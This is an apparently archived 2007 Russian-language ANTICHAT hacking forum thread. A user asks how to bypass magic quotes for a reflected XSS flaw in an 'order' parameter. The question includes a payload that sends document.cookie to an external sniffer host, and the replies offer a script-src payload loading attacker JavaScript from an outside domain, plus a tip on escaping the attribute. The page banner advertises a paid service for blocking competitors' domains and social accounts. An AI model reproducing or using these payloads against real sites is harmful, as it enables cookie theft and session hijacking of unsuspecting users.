Как, — ANTICHAT Forum

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Как,

Опции темы

Поиск в этой теме

Опции просмотра

Как,

22.11.2007, 21:04

x-demon

Постоянный

Регистрация: 10.06.2007

Сообщений: 476

С нами: 9957986

Репутация: 299

Отправить сообщение для x-demon с помощью AIM

Отправить сообщение для x-demon с помощью MSN

Отправить сообщение для x-demon с помощью Yahoo

Как,

Короче есть уязвимость. Но на сервере включены magic quotes.
Как обойти? xss пасивная
somesite/?order=%22%3E%3Cscript%3Edocument.location.href=%2 7javascript:http://snfiffaddr.tld/s.gif?%27+document.cookie;%3C/script%3E

𝕏 Twitter Reddit Telegram Копировать ссылку

22.11.2007, 21:25

+toxa+

[Лишённый самовыражени

Регистрация: 16.01.2005

Сообщений: 1,787

С нами: 11217866

Репутация: 3812

Отправить сообщение для +toxa+ с помощью AIM

somesite/?order=<script src=http://hek.ru/1.js></script>

в 1.js пишешь нужный те код

__________________

07.12.2007, 22:22

ReVOLVeR

Участник форума

Регистрация: 02.09.2006

Сообщений: 176

С нами: 10362626

Репутация: 327

если вдруг не выполнится посмотри в исходник страницы, найди строку, глянь может надо добавить /> после order=

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
FAQ. Перед тем как задать вопрос.	Fata1ex	Skype, IRC, ICQ, Jabber и другие IM	1	04.11.2007 20:35
Как напакастить форумчанам или как сказать :)	Ponchik	Уязвимости CMS / форумов	8	02.10.2006 19:37